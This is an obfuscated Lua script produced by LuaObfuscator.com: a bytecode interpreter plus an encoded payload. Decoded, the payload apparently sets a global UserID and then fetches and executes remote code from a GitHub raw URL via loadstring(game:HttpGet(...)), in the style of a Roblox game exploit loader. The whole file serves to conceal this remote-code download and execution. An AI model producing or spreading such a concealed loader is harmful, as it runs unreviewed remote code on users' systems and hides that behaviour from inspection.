--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==1) then v5=string.gsub;v6=string.rep;v7=table.concat;v8=table.insert;v0=2;end if (v0==2) then v9=math.ldexp;v10=getfenv or function()return _ENV;end ;v11=setmetatable;v12=pcall;v0=3;end if (v0==3) then v13=select;v14=unpack or table.unpack ;v15=tonumber;v16=nil;v0=4;end if (v0==4) then v16=function(v22,v23,...)local v27=0;local v28;local v29;local v30;local v31;local v32;local v33;local v34;local v35;local v36;local v37;local v38;local v39;while true do if (v27==2) then v32=function()local v48,v49=v2(v22,v28,v28 + 2 + 0 );v28=v28 + 2 + 0 ;return (v49 * (225 + 31)) + v48 ;end;v33=nil;v33=function()local v50,v51,v52,v53=v2(v22,v28,v28 + 2 + 1 );v28=v28 + 4 ;return (v53 * (16777563 -(56 + 291))) + (v52 * 65536) + (v51 * (201 + 55)) + v50 ;end;v34=nil;v27=3;end if (v27==1) then v30=function(v40,v41,v42)if v42 then local v83=(v40/((468 -(189 + 277))^(v41-(666 -(411 + 254)))))%((3 -1)^(((v42-1) -(v41-(1 -0))) + 1 + 0)) ;return v83-(v83%(336 -(247 + 88))) ;else local v84=(2 + 0)^(v41-(1 -0)) ;return (((v40%(v84 + v84))>=v84) and (530 -((600 -(234 + 140)) + (1328 -(791 + 234))))) or 0 ;end end;v31=nil;v31=function()local v54=v2(v22,v28,v28);v28=v28 + 1 ;return v54;end;v32=nil;v27=2;end if (0==v27) then v28=1;v29=nil;v22=v5(v4(v22,5),"..",function(v43)if (v2(v43,2)==79) then v29=v1(v4(v43,1,1));return "";else local v85=0;local v86;while true do if (0==v85) then v86=v3(v1(v43,16));if v29 then local v108=v6(v86,v29);v29=nil;return v108;else return v86;end break;end end end end);v30=nil;v27=1;end if (v27==3) then v34=function()local v55=1329 -(832 + 497) ;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v55==(1713 -(1262 + 448))) then if (v60==((2548 -(403 + 695)) -((600 -(7 + 6)) + 863))) then if (v59==(0 -0)) then return v61 * 0 ;else local v109=0 + 0 ;while true do if (v109==(0 + 0)) then v60=2 -1 ;v58=0 + (1424 -(851 + 573)) ;break;end end end elseif (v60==(1077 + 970)) then return ((v59==(0 -(1287 -(1103 + 184)))) and (v61 * ((1665 -(28 + (3107 -(36 + 1435))))/(0 -0)))) or (v61 * NaN) ;end return v9(v61,v60-((2460 -744) -693) ) * (v58 + (v59/(2^(16 + 36)))) ;end if (1==v55) then v58=3 -2 ;v59=(v30(v57,2 -1 ,20) * (2^(11 + 21))) + v56 ;v55=933 -(731 + 200) ;end if (v55==(620 -(268 + 352))) then v56=v33();v57=v33();v55=1 -0 ;end if (v55==(2 + 0)) then v60=v30(v57,932 -(233 + 387 + 291) ,58 -(1179 -(981 + 171)) );v61=((v30(v57,1969 -(943 + 994) )==(1 + 0)) and  -(1 + 0)) or (1 + 0) ;v55=2 + 1 ;end end end;v35=nil;v35=function(v44)local v62;if  not v44 then local v87=94 -(93 + 1) ;while true do if (v87==(0 + (0 -0))) then v44=v33();if (v44==((1116 + 685) -(301 + (2618 -(1033 + 85))))) then return "";end break;end end end v62=v4(v22,v28,(v28 + v44) -(1364 -(1057 + 306)) );v28=v28 + v44 ;local v63={};for v76=1, #v62 do v63[v76]=v3(v2(v4(v62,v76,v76)));end return v7(v63);end;v36=v33;v27=4;end if (v27==5) then v39=nil;v39=function(v45,v46,v47)local v64=v45[1];local v65=v45[2];local v66=v45[3];return function(...)local v78=1;local v79= -1;local v80={...};local v81=v13("#",...) -1 ;local function v82()local v88=v64;local v89=v65;local v90=v66;local v91=v37;local v92={};local v93={};local v94={};for v98=0,v81 do if ((((3115 + 4130) -4597)>((1961 + 1674) -(1098 + 170))) and (v98>=v90)) then v92[v98-v90 ]=v80[v98 + 1 ];else v94[v98]=v80[v98 + 1 + 0 ];end end local v95=(v81-v90) + 1 + 0 ;local v96;local v97;while true do local v99=0;local v100;while true do if ((((0 -0) -0)==v99) or (3868==(8827 -5970))) then v100=0;while true do if ((v100==(0 -0)) or ((10644 -7055)>=(3880 + 370))) then v96=v88[v78];v97=v96[(120 -(62 + 54)) -3 ];v100=328 -(247 + 80) ;end if ((((808 -526) + 471)==(120 + 633)) and (v100==1)) then if (((13787 -10131)>(172 + 973)) and (v97<=((1738 -(191 + 1546)) + 3))) then if (((546 + 902)==((2585 -1336) + 199)) and (v97<=((1433 -647) -(752 + 33)))) then if ((v97>(0 + 0)) or (2325<=((3123 -1329) + 424))) then v94[v96[3 -1 ]]=v96[3];else local v119=0;local v120;local v121;local v122;local v123;local v124;while true do if ((v119==(1289 -((454 -94) + 928))) or ((2532 -(387 + 567))>3752)) then v122=nil;v123=nil;v119=2;end if (((12997 -(17482 -8998))>((4632 -(1137 + 156)) -2297)) and ((0 + 0)==v119)) then v120=0 + 0 ;v121=nil;v119=(1 + 1) -(960 -(511 + 448)) ;end if ((v119==(5 -(547 -(247 + 297)))) or (((36666 -27482) -6860)<=359)) then v124=nil;while true do if (((3087 -(1631 + 516))<3901) and ((0 + 0)==v120)) then local v144=369 -((335 -135) + 169) ;while true do if ((v144==(1 -0)) or (((6001 -(59 + 25)) -(862 + 959))>=(2258 + 204 + 714 + 1756))) then v120=1;break;end if ((v144==(0 + (112 -(86 + 26)))) or (((2831 -(21 + 29)) -(289 + 524))<=(59 + 265))) then v121=v96[3 -1 ];v122,v123=v91(v94[v121](v14(v94,v121 + (2 -1) ,v96[277 -(5 + 10 + 259) ])));v144=1002 -(523 + 478) ;end end end if (((5 -3)==v120) or (((2312 -1157) -(323 + 23))>((5551 -(1702 + 128)) -(550 + 796)))) then for v152=v121,v79 do local v153=0 + 0 ;local v154;while true do if (((8562 -4931)>=(2794 -(660 + 208))) and (v153==0)) then v154=0 + 0 ;while true do if ((v154==(0 + 0)) or (1887>=(4007 -(1466 + 151)))) then v124=v124 + (1491 -(1117 + 373)) ;v94[v152]=v122[v124];break;end end break;end end end break;end if ((v120==(1 + 0)) or ((8850 -5422)>=(10042 -5049))) then v79=(v123 + v121) -(3 -2) ;v124=(2253 -(1323 + 90)) -(590 + 250) ;v120=1717 -(971 + 744) ;end end break;end end end elseif (((5796 -(344 + 1016))>(4147 + 224)) and (v97<=(397 -(310 + 85)))) then if ((v94[v96[5 -3 ]]==v96[3 + 1 ]) or ((1390 -(653 -(32 + 13)))>=(4136 -(63 + 303)))) then v78=v78 + (1549 -(1435 + 113)) + 0 ;else v78=v96[(2934 -2037) -(231 + 663) ];end elseif ((590>(351 -(29 + 22))) and (v97==(7 -4))) then local v137=(0 -0) -0 ;local v138;local v139;while true do if ((v137==1) or ((1233 + 401 + 1549)<2282)) then while true do if ((v138==(1542 -(529 + 1013))) or ((4755 -(630 + 22 + 276))<(3562 -(746 + 435)))) then v139=v96[(1446 -(27 + 1414)) -3 ];v94[v139]=v94[v139](v14(v94,v139 + 1 + 0 ,v79));break;end end break;end if ((v137==(0 -0)) or (4967<(2640 -1012))) then v138=1002 -(506 + (616 -120)) ;v139=nil;v137=1;end end else do return;end end elseif (((3092 -1755)==(45 + 13 + 1279)) and (v97<=(14 -8))) then if (((7774 -3432)==(16589 -12247)) and (v97>5)) then v94[v96[6 -4 ]]();else local v125=0 -0 ;local v126;local v127;local v128;local v129;while true do if ((1741>455) and (v125==(670 -(191 + 477)))) then while true do if ((v126==(511 -((923 -735) + 323))) or ((4735 -(96 + 139))<=3336)) then local v145=257 -(241 + 10 + 6) ;while true do if ((v145==(907 -(561 + 345))) or ((3688 -1764)>=(1184 + 2352))) then v126=(1108 -(661 + 446)) + 0 ;break;end if (((11 + 2329)>((444 + 1147) -(361 + (1641 -(449 + 1185))))) and (v145==(301 -(220 + 81)))) then v127=0 -0 ;v128=nil;v145=1232 -(422 + (2209 -1400)) ;end end end if ((1==v126) or ((2311 + 218)>=((5 -3) + 3003))) then v129=nil;while true do if (((59 + 1235)<(3447 -(778 + 244))) and (v127==0)) then local v162=1492 -(482 + 1010) ;local v163;while true do if ((((287 + 841) -(446 + 416))==(1275 -1009)) and (v162==(359 -(152 + 207)))) then v163=0 -0 ;while true do if (((1 + 0)==v163) or ((8442 -4253)<1493)) then v127=1322 -(1093 + 228) ;break;end if ((v163==(431 -((1670 -(411 + 993)) + 165))) or ((10282 -7790)<=(2516 -1771))) then local v180=0 + 0 ;while true do if (((4295 -(354 + (1928 -(1112 + 472))))>(2307 -778)) and (v180==(0 -0))) then v128=v96[(2 + 0) -(1416 -(1219 + 197)) ];v129=v94[v96[1 + 2 ]];v180=1 + 0 ;end if (((2579 -(36 + 237 + 136))>(1536 -(98 + 569))) and (v180==1)) then v163=1;break;end end end end break;end end end if (((2053 + 2514)>=2026) and (v127==(1 + 0))) then v94[v128 + (2 -1) ]=v129;v94[v128]=v129[v96[19 -15 ]];break;end end break;end end break;end if (((1076 + 1201)==2277) and (((857 -(18 + 79)) -(721 + 38))==v125)) then v128=nil;v129=nil;v125=5 -3 ;end if ((((1562 -(614 + 224)) -(200 + 356))<(5607 -(692 + 101))) and (v125==0)) then v126=1391 -(355 + 322 + 714) ;v127=nil;v125=2 -1 ;end end end elseif ((v97<=7) or (((740 + 1029) -(297 + 444))>(2111 + 1906))) then v78=v96[638 -(392 + (300 -57)) ];elseif (((7508 -4920)>(2198 -1342)) and (v97==((908 -(50 + 850)) + 0))) then v94[v96[5 -3 ]][v96[3]]=v96[9 -5 ];else v94[v96[2 -(0 + 0) ]]=v47[v96[514 -((1486 -(21 + 1031)) + 77) ]];end v78=v78 + ((1 + 0) -0) ;break;end end break;end end end end A,B=v37(v12(v82));if  not A[1] then local v101=v45[4][v78] or "?" ;error("Script error at ["   .. v101   .. "]:"   .. A[2] );else return v14(A,2,B);end end;end;return v39(v38(),{},v23)(...);end if (v27==4) then v37=nil;v37=function(...)return {...},v13("#",...);end;v38=nil;v38=function()local v67=0 + 0 ;local v68;local v69;local v70;local v71;local v72;local v73;local v74;local v75;while true do if (v67==(5 -3)) then v72=nil;v73=nil;v67=5 -2 ;end if (v67==(3 + 0)) then v74=nil;v75=nil;v67=1539 -(674 + 861) ;end if (v67~=(1 + 0)) then else v70=nil;v71=nil;v67=2;end if (v67==(1701 -(1110 + 587))) then while true do if (v68~=(4 -2)) then else local v106=0 + 0 ;while true do if (v106~=0) then else v73=nil;v74=nil;v106=1749 -(1678 + 70) ;end if (v106==(934 -(89 + 844))) then v68=777 -(600 + 174) ;break;end end end if (v68==(1 + 0)) then local v107=0 -0 ;while true do if (v107==(0 -0)) then local v114=0 + 0 ;while true do if (v114==1) then v107=1051 -(711 + 339) ;break;end if (v114~=(0 + 0)) then else v71=nil;v72=nil;v114=1 + 0 ;end end end if (v107==(1012 -(29 + 982))) then v68=2 + 0 ;break;end end end if (v68~=0) then else v69=0 + 0 ;v70=nil;v68=513 -(349 + 163) ;end if (v68~=(584 -(546 + 35))) then else v75=nil;while true do local v110=0 -0 ;local v111;while true do if (v110==(0 + 0)) then v111=1308 -(772 + 536) ;while true do if ((2 -1)==v111) then if (v69==(171 -(23 + 147))) then local v131=0 -0 ;local v132;local v133;while true do if (v131==(3 -2)) then while true do if ((0 -0)~=v132) then else v133=307 -(231 + 76) ;while true do if (v133==(1 -0)) then v75={};v69=2;break;end if ((1729 -(974 + 755))~=v133) then else local v167=1539 -(923 + 616) ;while true do if (v167==(1 + 0)) then v133=1;break;end if ((0 + 0)==v167) then v73={v70,v71,nil,v72};v74=v33();v167=1;end end end end break;end end break;end if (v131==0) then v132=0 + 0 ;v133=nil;v131=1;end end end if (v69~=2) then else local v134=0 + 0 ;local v135;while true do if (0==v134) then v135=0 -0 ;while true do if (v135==(0 + 0)) then local v146=0 -0 ;while true do if (v146==(1 + 0)) then v135=1 + 0 ;break;end if (v146==0) then for v169=1 + 0 ,v74 do local v170=0 -0 ;local v171;local v172;local v173;local v174;while true do if (v170~=(0 + 0)) then else v171=0 -0 ;v172=nil;v170=1;end if (v170==(5 -3)) then while true do if (v171==1) then v174=nil;while true do if (v172==(539 -(489 + 50))) then v173=v31();v174=nil;v172=1;end if (v172~=1) then else if (v173==(1 + 0)) then v174=v31()~=0 ;elseif (v173==(1738 -(1439 + 297))) then v174=v34();elseif (v173~=(7 -4)) then else v174=v35();end v75[v169]=v174;break;end end break;end if (v171~=(689 -(387 + 302))) then else v172=0 + 0 ;v173=nil;v171=2 -1 ;end end break;end if (v170==1) then v173=nil;v174=nil;v170=5 -3 ;end end end v73[918 -(272 + 643) ]=v31();v146=1 + 0 ;end end end if ((1 + 0)==v135) then for v155=1 -0 ,v33() do local v156=0 + 0 ;local v157;local v158;while true do if ((813 -(673 + 139))~=v156) then else while true do if (v157==(0 -0)) then v158=v31();if (v30(v158,2 -1 ,1)==(40 -(36 + 4))) then local v181=0 -0 ;local v182;local v183;local v184;local v185;while true do if (v181~=0) then else local v188=1139 -(398 + 741) ;local v189;while true do if (0==v188) then v189=0;while true do if (v189==(977 -(537 + 439))) then v181=1 + 0 ;break;end if (v189~=0) then else v182=0;v183=nil;v189=1;end end break;end end end if (v181~=(5 -3)) then else while true do if (v182==(691 -(146 + 542))) then if (v30(v184,3,3 + 0 )~=(1 + 0)) then else v185[4]=v75[v185[4]];end v70[v155]=v185;break;end if (v182==(7 -5)) then local v195=0;local v196;local v197;while true do if (v195==(0 + 0)) then v196=0 + 0 ;v197=nil;v195=1;end if (v195~=(1 -0)) then else while true do if (v196~=(0 + 0)) then else v197=0 -0 ;while true do if (v197==(1576 -(1310 + 266))) then local v211=0 -0 ;while true do if (v211==1) then v197=2 -1 ;break;end if (v211==(0 + 0)) then if (v30(v184,1,1 + 0 )==1) then v185[1 + 1 ]=v75[v185[7 -5 ]];end if (v30(v184,2,5 -3 )~=1) then else v185[9 -6 ]=v75[v185[2 + 1 ]];end v211=1 -0 ;end end end if (v197==(1 -0)) then v182=3;break;end end break;end end break;end end end if (v182==(0 + 0)) then local v198=221 -(125 + 96) ;local v199;while true do if ((0 -0)==v198) then v199=0 + 0 ;while true do if (v199==(0 -0)) then local v210=1526 -(864 + 662) ;while true do if (v210==(0 -0)) then v183=v30(v158,394 -(144 + 248) ,1548 -(850 + 695) );v184=v30(v158,1438 -(615 + 819) ,1234 -(826 + 402) );v210=899 -(499 + 399) ;end if (v210==(1 + 0)) then v199=1;break;end end end if (v199~=(1334 -(1195 + 138))) then else v182=1999 -(1940 + 58) ;break;end end break;end end end if (v182==(1 + 0)) then local v200=0 -0 ;local v201;local v202;while true do if (v200~=(0 -0)) then else v201=1567 -(1302 + 265) ;v202=nil;v200=1041 -(734 + 306) ;end if (v200~=1) then else while true do if (v201~=(0 -0)) then else v202=0;while true do if (v202~=(1506 -(157 + 1348))) then else v182=2 -0 ;break;end if (v202~=(0 -0)) then else local v212=0 -0 ;while true do if (v212==0) then v185={v32(),v32(),nil,nil};if (v183==(0 -0)) then local v217=0 -0 ;local v218;local v219;local v220;while true do if (v217==(260 -(168 + 91))) then v220=nil;while true do if (v218==(1 + 0)) then while true do if (v219==0) then v220=319 -(280 + 39) ;while true do if (v220==(0 + 0)) then v185[1 + 2 ]=v32();v185[1 + 3 ]=v32();break;end end break;end end break;end if ((0 -0)==v218) then local v223=1728 -(1024 + 704) ;while true do if (v223==(1409 -(344 + 1064))) then v218=3 -2 ;break;end if ((0 + 0)==v223) then v219=757 -(476 + 281) ;v220=nil;v223=1670 -(427 + 1242) ;end end end end break;end if (v217==0) then v218=0;v219=nil;v217=2 -1 ;end end elseif (v183==(265 -(42 + 222))) then v185[12 -9 ]=v33();elseif (v183==(1 + 1)) then v185[4 -1 ]=v33() -((2 -0)^(629 -(333 + 280))) ;elseif (v183==(1 + 2)) then local v224=105 -(62 + 43) ;local v225;local v226;while true do if ((1 + 0)~=v224) then else while true do if (v225==(0 + 0)) then v226=0 + 0 ;while true do if (v226==(591 -(367 + 224))) then v185[3]=v33() -((87 -(13 + 72))^(4 + 12)) ;v185[9 -5 ]=v32();break;end end break;end end break;end if (v224~=(1418 -(257 + 1161))) then else v225=0 + 0 ;v226=nil;v224=1;end end end v212=1;end if (v212==(1 + 0)) then v202=3 -2 ;break;end end end end break;end end break;end end end end break;end if (v181~=(2 -1)) then else local v190=1815 -(632 + 1183) ;local v191;while true do if (v190==(0 + 0)) then v191=1870 -(1729 + 141) ;while true do if (v191==(687 -(175 + 512))) then local v209=0 + 0 ;while true do if ((1336 -(354 + 981))==v209) then v191=1 + 0 ;break;end if ((1507 -(411 + 1096))==v209) then v184=nil;v185=nil;v209=3 -2 ;end end end if (v191~=(2 -1)) then else v181=1862 -(435 + 1425) ;break;end end break;end end end end end break;end end break;end if (v156==(0 + 0)) then v157=0;v158=nil;v156=1;end end end v69=3 + 0 ;break;end end break;end end end break;end if (v111==(0 -0)) then local v115=0;local v116;while true do if (v115==(1489 -(320 + 1169))) then v116=0 -0 ;while true do if ((0 -0)~=v116) then else if (v69==(623 -(7 + 613))) then local v147=0;local v148;local v149;while true do if (v147~=(0 + 0)) then else v148=0;v149=nil;v147=218 -(192 + 25) ;end if ((1 + 0)~=v147) then else while true do if (v148~=(0 -0)) then else v149=0;while true do local v179=1838 -(360 + 1478) ;while true do if (v179~=(0 -0)) then else if (v149~=(1 + 0)) then else return v73;end if (v149==(0 + 0)) then local v192=0 + 0 ;while true do if (v192==(0 + 0)) then for v203=1583 -(535 + 1047) ,v33() do v71[v203-(1 + 0) ]=v38();end for v205=1 + 0 ,v33() do v72[v205]=v33();end v192=1;end if (v192~=(292 -(242 + 49))) then else v149=1103 -(726 + 376) ;break;end end end break;end end end break;end end break;end end end if ((0 -0)==v69) then local v150=653 -(379 + 274) ;local v151;while true do if (v150==0) then v151=642 -(54 + 588) ;while true do if (v151==(0 -0)) then local v175=0;local v176;while true do if (v175==0) then v176=703 -(626 + 77) ;while true do if (0==v176) then v70={};v71={};v176=1;end if (v176==(2 -1)) then v151=2 -1 ;break;end end break;end end end if ((1024 -(505 + 518))~=v151) then else v72={};v69=222 -(42 + 179) ;break;end end break;end end end v116=1;end if (v116~=(2 -1)) then else v111=4 -3 ;break;end end break;end end end end break;end end end break;end end break;end if (v67==(0 + 0)) then v68=0 + 0 ;v69=nil;v67=1 -0 ;end end end;v27=5;end end end;v16("LOL!083O00028O0003023O005F4703063O00557365724944030A3O0031393835383031333730030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403453O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F622O6C7869326372617A792F7363726970747073782F6D61696E2F62616E6B2E6C7561000F3O0012013O00013O0026023O0001000100010004073O00010001001209000100023O003008000100030004001209000100053O001209000200063O002005000200020007001201000400086O000200044O000300013O00022O00060001000100010004073O000E00010004073O000100012O00043O00017O000F3O00023O00043O00043O00053O00053O00063O00063O00063O00063O00063O00063O00063O00073O00083O000A3O00",v10(),...);break;end if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v4=string.sub;v0=1;end end end
